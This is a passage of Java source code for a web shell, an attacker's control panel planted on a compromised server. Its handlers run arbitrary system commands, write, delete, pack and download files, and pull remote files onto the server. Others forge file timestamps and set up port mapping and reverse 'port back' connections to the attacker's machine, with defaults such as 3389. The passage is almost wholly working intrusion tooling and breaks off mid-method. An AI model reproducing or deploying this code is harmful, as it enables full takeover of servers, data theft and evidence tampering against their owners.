1645throw e ;
1646}
1647}
1648}
1649private static class CreateFileInvoker extends DefaultInvoker {
1650public boolean doBefore(){return false;}
1651public boolean doAfter(){return false;}
1652public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1653try {
1654PrintWriter out = response.getWriter();
1655String path = request.getParameter("filepath");
1656String content = request.getParameter("filecontent");
1657String charset = request.getParameter("charset");
1658BufferedWriter outs = null;
1659if (charset.equals("ANSI"))
1660outs = new BufferedWriter(new FileWriter(new File(path)));
1661else
1662outs = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(path)),charset));
1663outs.write(content,0,content.length());
1664outs.close();
1665JSession.setAttribute(MSG,"Save File <span style='color:green'>"+(new File(path)).getName()+"</span> With <span style='font-weight:bold;color:red'>"+charset+"</span> Success!");
1666response.sendRedirect(SHELL_NAME);
1667} catch (Exception e) {
1668
1669throw e ;
1670}
1671}
1672}
1673private static class VEditPropertyInvoker extends DefaultInvoker {
1674public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1675try {
1676PrintWriter out = response.getWriter();
1677String filepath = request.getParameter("filepath");
1678File f = new File(filepath);
1679if (!f.exists())
1680return;
1681String read = f.canRead() ? "checked=\"checked\"" : "";
1682String write = f.canWrite() ? "checked=\"checked\"" : "";
1683Calendar cal = Calendar.getInstance();
1684cal.setTimeInMillis(f.lastModified());
1685
1686out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
1687"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1688"<h2>Set File Property »</h2>"+
1689"<p>Current File (FullPath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""+request.getParameter("filepath")+"\" type=\"text\" size=\"120\" /></p>"+
1690"<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "+
1691"<p>"+
1692" <input type=\"checkbox\" disabled "+read+" name=\"read\" id=\"checkbox\">Read "+
1693" <input type=\"checkbox\" disabled "+write+" name=\"write\" id=\"checkbox2\">Write "+
1694"</p>"+
1695"<p>Instead »"+
1696"year:"+
1697"<input class=\"input\" name=\"year\" value="+cal.get(Calendar.YEAR)+" id=\"year\" type=\"text\" size=\"4\" />"+
1698"month:"+
1699"<input class=\"input\" name=\"month\" value="+(cal.get(Calendar.MONTH)+1)+" id=\"month\" type=\"text\" size=\"2\" />"+
1700"day:"+
1701"<input class=\"input\" name=\"date\" value="+cal.get(Calendar.DATE)+" id=\"date\" type=\"text\" size=\"2\" />"+
1702""+
1703"hour:"+
1704"<input class=\"input\" name=\"hour\" value="+cal.get(Calendar.HOUR)+" id=\"hour\" type=\"text\" size=\"2\" />"+
1705"minute:"+
1706"<input class=\"input\" name=\"minute\" value="+cal.get(Calendar.MINUTE)+" id=\"minute\" type=\"text\" size=\"2\" />"+
1707"second:"+
1708"<input class=\"input\" name=\"second\" value="+cal.get(Calendar.SECOND)+" id=\"second\" type=\"text\" size=\"2\" />"+
1709"</p>"+
1710"<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"+
1711"</form>"+
1712"</td></tr></table>");
1713} catch (Exception e) {
1714throw e ;
1715}
1716}
1717}
1718private static class EditPropertyInvoker extends DefaultInvoker {
1719public boolean doBefore(){return false;}
1720public boolean doAfter(){return false;}
1721public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1722try {
1723String f = request.getParameter("file");
1724File file = new File(f);
1725if (!file.exists())
1726return;
1727
1728String year = request.getParameter("year");
1729String month = request.getParameter("month");
1730String date = request.getParameter("date");
1731String hour = request.getParameter("hour");
1732String minute = request.getParameter("minute");
1733String second = request.getParameter("second");
1734
1735Calendar cal = Calendar.getInstance();
1736cal.set(Calendar.YEAR,Integer.parseInt(year));
1737cal.set(Calendar.MONTH,Integer.parseInt(month)-1);
1738cal.set(Calendar.DATE,Integer.parseInt(date));
1739cal.set(Calendar.HOUR,Integer.parseInt(hour));
1740cal.set(Calendar.MINUTE,Integer.parseInt(minute));
1741cal.set(Calendar.SECOND,Integer.parseInt(second));
1742if(file.setLastModified(cal.getTimeInMillis())){
1743JSession.setAttribute(MSG,"Reset File Property Success!");
1744} else {
1745JSession.setAttribute(MSG,"<span style='color:red'>Reset File Property Failed!</span>");
1746}
1747response.sendRedirect(SHELL_NAME);
1748} catch (Exception e) {
1749
1750throw e ;
1751}
1752}
1753}
1754//VShell
1755private static class VsInvoker extends DefaultInvoker{
1756public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1757try {
1758PrintWriter out = response.getWriter();
1759String cmd = request.getParameter("command");
1760String program = request.getParameter("program");
1761if (cmd == null) {
1762if (ISLINUX)
1763cmd = "id";
1764else
1765cmd = "cmd.exe /c set";
1766}
1767if (program == null)
1768program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt";
1769if (JSession.getAttribute(MSG)!=null) {
1770Util.outMsg(out,JSession.getAttribute(MSG).toString());
1771JSession.removeAttribute(MSG);
1772}
1773out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
1774"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1775"<h2>Execute Program »</h2>"+
1776"<p>"+
1777"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
1778"<input type=\"hidden\" name=\"type\" value=\"program\">"+
1779"Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""+program+"\" type=\"text\" size=\"100\" />"+
1780"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"+
1781"</p>"+
1782"</form>"+
1783"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1784"<h2>Execute Shell »</h2>"+
1785"<p>"+
1786"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
1787"<input type=\"hidden\" name=\"type\" value=\"command\">"+
1788"Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""+cmd+"\" type=\"text\" size=\"100\" />"+
1789"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\" />"+
1790"</p>"+
1791"</form>"+
1792"</td>"+
1793"</tr></table>");
1794} catch (Exception e) {
1795
1796throw e ;
1797}
1798}
1799}
1800private static class ShellInvoker extends DefaultInvoker{
1801public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1802try {
1803PrintWriter out = response.getWriter();
1804String type = request.getParameter("type");
1805if (type.equals("command")) {
1806((Invoker)ins.get("vs")).invoke(request,response,JSession);
1807out.println("<div style='margin:10px'><hr/>");
1808out.println("<pre>");
1809String command = request.getParameter("command");
1810if (!Util.isEmpty(command)) {
1811Process pro = Runtime.getRuntime().exec(command);
1812BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
1813String s = reader.readLine();
1814while (s != null) {
1815out.println(Util.htmlEncode(Util.getStr(s)));
1816s = reader.readLine();
1817}
1818reader.close();
1819reader = new BufferedReader(new InputStreamReader(pro.getErrorStream()));
1820s = reader.readLine();
1821while (s != null) {
1822out.println(Util.htmlEncode(Util.getStr(s)));
1823s = reader.readLine();
1824}
1825reader.close();
1826out.println("</pre></div>");
1827}
1828} else {
1829String program = request.getParameter("program");
1830if (!Util.isEmpty(program)) {
1831Process pro = Runtime.getRuntime().exec(program);
1832JSession.setAttribute(MSG,"Program Has Run Success!");
1833((Invoker)ins.get("vs")).invoke(request,response,JSession);
1834}
1835}
1836} catch (Exception e) {
1837
1838throw e ;
1839}
1840}
1841}
1842private static class DownInvoker extends DefaultInvoker{
1843public boolean doBefore(){return false;}
1844public boolean doAfter(){return false;}
1845public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1846try {
1847String path = request.getParameter("path");
1848if (Util.isEmpty(path))
1849return;
1850InputStream i = null;
1851Object enter = JSession.getAttribute(ENTER);
1852String fileName = null;
1853if (enter == null) {
1854File f = new File(path);
1855if (!f.exists())
1856return;
1857fileName = f.getName();
1858i = new FileInputStream(f);
1859} else {
1860ZipFile zf = new ZipFile((String)enter);
1861ZipEntry entry = new ZipEntry(path);
1862fileName = entry.getName().substring(entry.getName().lastIndexOf("/") + 1);
1863i = zf.getInputStream(entry);
1864}
1865response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(fileName,PAGE_CHARSET));
1866BufferedInputStream input = new BufferedInputStream(i);
1867BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream());
1868byte[] data = new byte[1024];
1869int len = input.read(data);
1870while (len != -1) {
1871output.write(data,0,len);
1872len = input.read(data);
1873}
1874input.close();
1875output.close();
1876} catch (Exception e) {
1877
1878throw e ;
1879}
1880}
1881}
1882//VDown
1883private static class VdInvoker extends DefaultInvoker {
1884public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1885try {
1886PrintWriter out = response.getWriter();
1887String savepath = request.getParameter("savepath");
1888String url = request.getParameter("url");
1889if (Util.isEmpty(url))
1890url = "http://www.forjj.com/";
1891if (Util.isEmpty(savepath)) {
1892savepath = JSession.getAttribute(CURRENT_DIR).toString();
1893}
1894if (!Util.isEmpty(JSession.getAttribute("done"))) {
1895Util.outMsg(out,"Download Remote File Success!");
1896JSession.removeAttribute("done");
1897}
1898out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
1899"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
1900"<h2>Remote File DownLoad »</h2>"+
1901"<p>"+
1902"<input type=\"hidden\" name=\"o\" value=\"downRemote\">"+
1903"<p>File URL: "+
1904" <input class=\"input\" name=\"url\" value=\""+url+"\" id=\"url\" type=\"text\" size=\"200\" /></p>"+
1905"<p>Save Path: "+
1906"<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""+savepath+"\" type=\"text\" size=\"200\" /></p>"+
1907"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\" />"+
1908"</p>"+
1909"</form></table>");
1910} catch (Exception e) {
1911
1912throw e ;
1913}
1914}
1915}
1916private static class DownRemoteInvoker extends DefaultInvoker {
1917public boolean doBefore(){return true;}
1918public boolean doAfter(){return true;}
1919public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1920try {
1921String downFileUrl = request.getParameter("url");
1922String savePath = request.getParameter("savepath");
1923if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
1924return;
1925URL downUrl = new URL(downFileUrl);
1926URLConnection conn = downUrl.openConnection();
1927
1928File tempF = new File(savePath);
1929File saveF = tempF;
1930if (tempF.isDirectory()) {
1931String fName = downFileUrl.substring(downFileUrl.lastIndexOf("/")+1);
1932saveF = new File(tempF,fName);
1933}
1934BufferedInputStream in = new BufferedInputStream(conn.getInputStream());
1935BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(saveF));
1936byte[] data = new byte[1024];
1937int len = in.read(data);
1938while (len != -1) {
1939out.write(data,0,len);
1940len = in.read(data);
1941}
1942in.close();
1943out.close();
1944JSession.setAttribute("done","d");
1945((Invoker)ins.get("vd")).invoke(request,response,JSession);
1946} catch (Exception e) {
1947
1948throw e ;
1949}
1950}
1951}
1952private static class IndexInvoker extends DefaultInvoker {
1953public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1954try {
1955((Invoker)ins.get("filelist")).invoke(request,response,JSession);
1956} catch (Exception e) {
1957
1958throw e ;
1959}
1960}
1961}
1962private static class MkDirInvoker extends DefaultInvoker {
1963public boolean doBefore(){return false;}
1964public boolean doAfter(){return false;}
1965public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1966try {
1967String name = request.getParameter("name");
1968File f = new File(name);
1969if (!f.isAbsolute()) {
1970String path = JSession.getAttribute(CURRENT_DIR).toString();
1971if (!path.endsWith("/"))
1972path += "/";
1973path += name;
1974f = new File(path);
1975}
1976f.mkdirs();
1977JSession.setAttribute(MSG,"Make Directory Success!");
1978response.sendRedirect(SHELL_NAME);
1979} catch (Exception e) {
1980
1981throw e ;
1982}
1983}
1984}
1985private static class MoveInvoker extends DefaultInvoker {
1986public boolean doBefore(){return false;}
1987public boolean doAfter(){return false;}
1988public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
1989try {
1990PrintWriter out = response.getWriter();
1991String src = request.getParameter("src");
1992String target = request.getParameter("to");
1993if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
1994File file = new File(src);
1995if(file.renameTo(new File(target))) {
1996JSession.setAttribute(MSG,"Move File Success!");
1997} else {
1998String msg = "Move File Failed!";
1999if (file.isDirectory()) {
2000msg += "The Move Will Failed When The Directory Is Not Empty.";
2001}
2002JSession.setAttribute(MSG,msg);
2003}
2004response.sendRedirect(SHELL_NAME);
2005}
2006} catch (Exception e) {
2007
2008throw e ;
2009}
2010}
2011}
2012private static class RemoveDirInvoker extends DefaultInvoker {
2013public boolean doBefore(){return false;}
2014public boolean doAfter(){return false;}
2015public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2016try {
2017String dir = request.getParameter("dir");
2018File file = new File(dir);
2019if (file.exists()) {
2020deleteFile(file);
2021deleteDir(file);
2022}
2023
2024JSession.setAttribute(MSG,"Remove Directory Success!");
2025response.sendRedirect(SHELL_NAME);
2026} catch (Exception e) {
2027
2028throw e ;
2029}
2030}
2031public void deleteFile(File f) {
2032if (f.isFile()) {
2033f.delete();
2034}else {
2035File[] list = f.listFiles();
2036for (int i = 0;i<list.length;i++) {
2037File ff=list[i];
2038deleteFile(ff);
2039}
2040}
2041}
2042public void deleteDir(File f) {
2043File[] list = f.listFiles();
2044if (list.length == 0) {
2045f.delete();
2046} else {
2047for (int i = 0;i<list.length;i++) {
2048File ff=list[i];
2049deleteDir(ff);
2050}
2051deleteDir(f);
2052}
2053}
2054}
2055private static class PackBatchInvoker extends DefaultInvoker{
2056public boolean doBefore(){return false;}
2057public boolean doAfter(){return false;}
2058public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2059try {
2060String files = request.getParameter("files");
2061if (Util.isEmpty(files))
2062return;
2063String saveFileName = request.getParameter("savefilename");
2064File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
2065if (saveF.exists()) {
2066JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
2067response.sendRedirect(SHELL_NAME);
2068return;
2069}
2070ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
2071String[] arr = files.split(",");
2072for (int i = 0;i<arr.length;i++) {
2073String f=arr[i];
2074File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f);
2075ZipEntry entry = new ZipEntry(pF.getName());
2076zout.putNextEntry(entry);
2077FileInputStream fInput = new FileInputStream(pF);
2078int len = 0;
2079byte[] buf = new byte[1024];
2080while ((len = fInput.read(buf)) != -1) {
2081zout.write(buf, 0, len);
2082zout.flush();
2083}
2084fInput.close();
2085}
2086zout.close();
2087JSession.setAttribute(MSG,"Pack Files Success!");
2088response.sendRedirect(SHELL_NAME);
2089} catch (Exception e) {
2090
2091throw e;
2092}
2093}
2094}
2095private static class VPackConfigInvoker extends DefaultInvoker{
2096public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2097try {
2098PrintWriter out = response.getWriter();
2099String packfile = request.getParameter("packedfile");
2100String currentd = JSession.getAttribute(CURRENT_DIR).toString();
2101out.println("<form action='"+SHELL_NAME+"' method='post'>"+
2102"<input type='hidden' name='o' value='pack'/>"+
2103"<input type='hidden' name='config' value='true'/>"+
2104"<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2105" <tr>"+
2106" <td><h2 id=\"Bin_H2_Title\">Pack Configuration >><hr/></h2>"+
2107" <div id=\"hOWTm\">"+
2108" <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
2109" <tr align=\"center\">"+
2110" <td style=\"width:5%\"></td>"+
2111" <td align=\"center\"><table border=\"0\">"+
2112" <tr>"+
2113" <td>Packed Dir</td>"+
2114" <td><input type=\"text\" name=\"packedfile\" size='100' value=\""+packfile+"\" class=\"input\"/></td>"+
2115" </tr>"+
2116" <tr>"+
2117" <td>Save To</td>"+
2118" <td><input type=\"text\" name=\"savefilename\" size='100' value=\""+((currentd.endsWith("/") ? currentd : currentd+"/")+"pack.zip")+"\" class=\"input\"/></td>"+
2119" </tr>"+
2120" <tr>"+
2121" <td colspan=\"2\"><fieldset><legend>Ext Filter</legend>"+
2122" <input type='radio' name='extfilter' value='no'/>no <input checked type='radio' name='extfilter' value='blacklist'/>Blacklist <input type='radio' name='extfilter' value='whitelist'/>Whitelist"+
2123" <hr/><input type='text' class='input' size='100' value='mp3,wmv,rm,rmvb,avi' name='fileext'/>"+
2124" </fieldset></td>"+
2125" </tr>"+
2126" <tr>"+
2127" <td>Filesize Filter</td>"+
2128" <td><input type=\"text\" name=\"filesize\" value=\"0\" class=\"input\"/>(KB) "+
2129" <input type='radio' name='sizefilter' value='no' checked>no <input type='radio' name='sizefilter' value='greaterthan'>greaterthan<input type='radio' name='sizefilter' value='lessthan'>lessthan</td>"+
2130" </tr>"+
2131" <tr>"+
2132" <td>Exclude Dir</td>"+
2133" <td><input type=\"text\" name=\"exclude\" size='100' class=\"input\"/></td>"+
2134" </tr>"+
2135" </table></td>"+
2136" </tr>"+
2137" <tr align=\"center\">"+
2138" <td colspan=\"2\">"+
2139" <input type=\"submit\" name=\"FJE\" value=\"Pack\" id=\"FJE\" class=\"bt\" />"+
2140" </td>"+
2141" </tr>"+
2142" </table>"+
2143" </div></td>"+
2144" </tr>"+
2145" </table></form>"
2146);
2147} catch (Exception e) {
2148
2149throw e;
2150}
2151}
2152}
2153private static class PackInvoker extends DefaultInvoker {
2154public boolean doBefore(){return false;}
2155public boolean doAfter(){return false;}
2156private boolean config = false;
2157private String extFilter = "blacklist";
2158private String[] fileExts = null;
2159private String sizeFilter = "no";
2160private int filesize = 0;
2161private String[] exclude = null;
2162private String packFile = null;
2163private void reset(){
2164this.config = false;
2165this.extFilter = "blacklist";
2166this.fileExts = null;
2167this.sizeFilter = "no";
2168this.filesize = 0;
2169this.exclude = null;
2170this.packFile = null;
2171}
2172public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2173try {
2174String config = request.getParameter("config");
2175if (!Util.isEmpty(config) && config.equals("true")) {
2176this.config = true;
2177this.extFilter = request.getParameter("extfilter");
2178this.fileExts = request.getParameter("fileext").split(",");
2179this.sizeFilter = request.getParameter("sizefilter");
2180this.filesize = Integer.parseInt(request.getParameter("filesize"));
2181this.exclude = request.getParameter("exclude").split(",");
2182}
2183String packedFile = request.getParameter("packedfile");
2184if (Util.isEmpty(packedFile))
2185return;
2186this.packFile = packedFile;
2187String saveFileName = request.getParameter("savefilename");
2188File saveF = null;
2189if (this.config)
2190saveF = new File(saveFileName);
2191else
2192saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
2193if (saveF.exists()) {
2194JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
2195response.sendRedirect(SHELL_NAME);
2196return;
2197}
2198File pF = new File(packedFile);
2199ZipOutputStream zout = null;
2200String base = "";
2201if (pF.isDirectory()) {
2202if (pF.listFiles().length == 0) {
2203JSession.setAttribute(MSG,"No File To Pack ! Maybe The Directory Is Empty .");
2204response.sendRedirect(SHELL_NAME);
2205this.reset();
2206return;
2207}
2208zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
2209zipDir(pF,base,zout);
2210} else {
2211zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
2212zipFile(pF,base,zout);
2213}
2214zout.close();
2215this.reset();
2216JSession.setAttribute(MSG,"Pack File Success!");
2217response.sendRedirect(SHELL_NAME);
2218} catch (Exception e) {
2219throw e;
2220}
2221}
2222public void zipDir(File f,String base,ZipOutputStream zout) throws Exception {
2223if (f.isDirectory()) {
2224if (this.config) {
2225String curName = f.getAbsolutePath().replace('\\','/');
2226curName = curName.replaceAll("\\Q"+this.packFile+"\\E","");
2227if (this.exclude != null) {
2228for (int i = 0;i<exclude.length;i++) {
2229if (!Util.isEmpty(exclude[i]) && curName.startsWith(exclude[i])) {
2230return;
2231}
2232}
2233}
2234}
2235File[] arr = f.listFiles();
2236for (int i = 0;i<arr.length;i++) {
2237File ff=arr[i];
2238String tmpBase = base;
2239if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
2240tmpBase += "/";
2241zipDir(ff,tmpBase+f.getName(),zout);
2242}
2243} else {
2244String tmpBase = base;
2245if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/"))
2246tmpBase += "/";
2247zipFile(f,tmpBase,zout);
2248}
2249
2250}
2251public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{
2252if (this.config) {
2253String ext = f.getName().substring(f.getName().lastIndexOf('.')+1);
2254if (this.extFilter.equals("blacklist")) {
2255if (Util.exists(this.fileExts,ext)) {
2256return;
2257}
2258} else if (this.extFilter.equals("whitelist")) {
2259if (!Util.exists(this.fileExts,ext)) {
2260return;
2261}
2262}
2263if (!this.sizeFilter.equals("no")) {
2264double size = f.length() / 1024;
2265if (this.sizeFilter.equals("greaterthan")) {
2266if (size < filesize)
2267return;
2268} else if (this.sizeFilter.equals("lessthan")) {
2269if (size > filesize)
2270return;
2271}
2272}
2273}
2274ZipEntry entry = new ZipEntry(base+f.getName());
2275zout.putNextEntry(entry);
2276FileInputStream fInput = new FileInputStream(f);
2277int len = 0;
2278byte[] buf = new byte[1024];
2279while ((len = fInput.read(buf)) != -1) {
2280zout.write(buf, 0, len);
2281zout.flush();
2282}
2283fInput.close();
2284}
2285}
2286private static class UnPackInvoker extends DefaultInvoker {
2287public boolean doBefore(){return false;}
2288public boolean doAfter(){return false;}
2289public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2290try {
2291String savepath = request.getParameter("savepath");
2292String zipfile = request.getParameter("zipfile");
2293if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
2294return;
2295File save = new File(savepath);
2296save.mkdirs();
2297ZipFile file = new ZipFile(new File(zipfile));
2298Enumeration e = file.entries();
2299while (e.hasMoreElements()) {
2300ZipEntry en = (ZipEntry) e.nextElement();
2301String entryPath = en.getName();
2302int index = entryPath.lastIndexOf("/");
2303if (index != -1)
2304entryPath = entryPath.substring(0,index);
2305File absEntryFile = new File(save,entryPath);
2306if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1))
2307absEntryFile.mkdirs();
2308BufferedOutputStream output = null;
2309BufferedInputStream input = null;
2310try {
2311output = new BufferedOutputStream(
2312new FileOutputStream(new File(save,en.getName())));
2313input = new BufferedInputStream(
2314file.getInputStream(en));
2315byte[] b = new byte[1024];
2316int len = input.read(b);
2317while (len != -1) {
2318output.write(b, 0, len);
2319len = input.read(b);
2320}
2321} catch (Exception ex) {
2322} finally {
2323try {
2324if (output != null)
2325output.close();
2326if (input != null)
2327input.close();
2328} catch (Exception ex1) {
2329}
2330}
2331}
2332file.close();
2333JSession.setAttribute(MSG,"UnPack File Success!");
2334response.sendRedirect(SHELL_NAME);
2335} catch (Exception e) {
2336
2337throw e ;
2338}
2339}
2340}
2341//VMapPort
2342private static class VmpInvoker extends DefaultInvoker {
2343public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2344try {
2345PrintWriter out = response.getWriter();
2346Object localIP = JSession.getAttribute("localIP");
2347Object localPort = JSession.getAttribute("localPort");
2348Object remoteIP = JSession.getAttribute("remoteIP");
2349Object remotePort = JSession.getAttribute("remotePort");
2350Object done = JSession.getAttribute("done");
2351
2352JSession.removeAttribute("localIP");
2353JSession.removeAttribute("localPort");
2354JSession.removeAttribute("remoteIP");
2355JSession.removeAttribute("remotePort");
2356JSession.removeAttribute("done");
2357
2358if (Util.isEmpty(localIP))
2359localIP = InetAddress.getLocalHost().getHostAddress();
2360if (Util.isEmpty(localPort))
2361localPort = "3389";
2362if (Util.isEmpty(remoteIP))
2363remoteIP = "www.forjj.com";
2364if (Util.isEmpty(remotePort))
2365remotePort = "80";
2366if (!Util.isEmpty(done))
2367Util.outMsg(out,done.toString());
2368
2369out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
2370"<input type=\"hidden\" name=\"o\" value=\"mapPort\">"+
2371" <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2372" <tr>"+
2373" <td><h2 id=\"Bin_H2_Title\">PortMap >><hr/></h2>"+
2374" <div id=\"hOWTm\">"+
2375" <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
2376" <tr align=\"center\">"+
2377" <td style=\"width:5%\"></td>"+
2378" <td style=\"width:20%\" align=\"left\"><br/>Local Ip :"+
2379" <input name=\"localIP\" id=\"localIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+localIP+"\" />"+
2380" </td>"+
2381" <td style=\"width:20%\" align=\"left\">Local Port :"+
2382" <input name=\"localPort\" id=\"localPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+localPort+"\" /></td>"+
2383" <td style=\"width:20%\" align=\"left\">Remote Ip :"+
2384" <input name=\"remoteIP\" id=\"remoteIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+remoteIP+"\" /></td>"+
2385" <td style=\"width:20%\" align=\"left\">Remote Port :"+
2386" <input name=\"remotePort\" id=\"remotePort\" type=\"text\" class=\"input\" size=\"20\" value=\""+remotePort+"\" /></td>"+
2387" </tr>"+
2388" <tr align=\"center\">"+
2389" <td colspan=\"5\"><br/>"+
2390" <input type=\"submit\" name=\"FJE\" value=\"MapPort\" id=\"FJE\" class=\"bt\" />"+
2391" <input type=\"button\" name=\"giX\" value=\"ClearAll\" id=\"giX\" onClick=\"location.href='"+SHELL_NAME+"?o=smp'\" class=\"bt\" />"+
2392" </td>"+
2393" </tr>"+
2394" </table>"+
2395" </div>"+
2396"</td>"+
2397"</tr>"+
2398"</table>"+
2399"</form>");
2400String targetIP = request.getParameter("targetIP");
2401String targetPort = request.getParameter("targetPort");
2402String yourIP = request.getParameter("yourIP");
2403String yourPort = request.getParameter("yourPort");
2404if (Util.isEmpty(targetIP))
2405targetIP = "127.0.0.1";
2406if (Util.isEmpty(targetPort))
2407targetPort = "3389";
2408if (Util.isEmpty(yourIP))
2409yourIP = request.getRemoteAddr();
2410if (Util.isEmpty(yourPort))
2411yourPort = "53";
2412out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
2413"<input type=\"hidden\" name=\"o\" value=\"portBack\">"+
2414" <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
2415" <tr>"+
2416" <td><h2 id=\"Bin_H2_Title\">Port Back >><hr/></h2>"+
2417" <div id=\"hOWTm\">"+
2418" <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
2419" <tr align=\"center\">"+
2420" <td style=\"width:5%\"></td>"+
2421" <td style=\"width:20%\" align=\"left\"><br/>Target Ip :"+
2422" <input name=\"targetIP\" id=\"targetIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+targetIP+"\" />"+
2423" </td>"+
2424" <td style=\"width:20%\" align=\"left\">Target Port :"+
2425" <input name=\"targetPort\" id=\"targetPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+targetPort+"\" /></td>"+
2426" <td style=\"width:20%\" align=\"left\">Your Ip :"+
2427" <input name=\"yourIP\" id=\"yourIP\" type=\"text\" class=\"input\" size=\"20\" value=\""+yourIP+"\" /></td>"+
2428" <td style=\"width:20%\" align=\"left\">Your Port :"+
2429" <input name=\"yourPort\" id=\"yourPort\" type=\"text\" class=\"input\" size=\"20\" value=\""+yourPort+"\" /></td>"+
2430" </tr>"+
2431" <tr align=\"center\">"+
2432" <td colspan=\"5\"><br/>"+
2433" <input type=\"submit\" name=\"FJE\" value=\"Port Back\" id=\"FJE\" class=\"bt\" />"+
2434" </td>"+
2435" </tr>"+
2436" </table>"+
2437" </div>"+
2438"</td>"+
2439"</tr>"+
2440"</table>"+
2441"</form>");
2442} catch (Exception e) {
2443
2444throw e ;
2445}
2446}
2447}
2448//StopMapPort
2449private static class SmpInvoker extends DefaultInvoker {
2450public boolean doAfter(){return true;}
2451public boolean doBefore(){return true;}
2452public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2453try {
2454Object obj = JSession.getAttribute(PORT_MAP);
2455if (obj != null) {
2456ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP);
2457server.close();
2458}
2459JSession.setAttribute("done","Stop Success!");
2460((Invoker)ins.get("vmp")).invoke(request,response,JSession);
2461} catch (Exception e) {
2462
2463throw e ;
2464}
2465}
2466}
2467//PortBack
2468private static class PortBackInvoker extends DefaultInvoker {
2469public boolean doAfter(){return true;}
2470public boolean doBefore(){return true;}
2471public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
2472try {
2473String targetIP = request.getParameter("targetIP");
2474String targetPort = request.getParameter("targetPort");
2475String yourIP = request.getParameter("yourIP");
